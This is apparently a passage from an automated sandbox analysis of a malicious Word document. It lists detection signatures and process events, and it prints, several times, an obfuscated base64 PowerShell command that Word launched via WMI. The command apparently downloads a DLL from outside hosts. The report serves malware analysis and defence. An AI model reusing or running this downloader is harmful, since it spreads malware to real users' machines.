KQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ	Jump to behavior

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_000007FF00281ADC pushad ; ret

4_2_000007FF00281B41

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
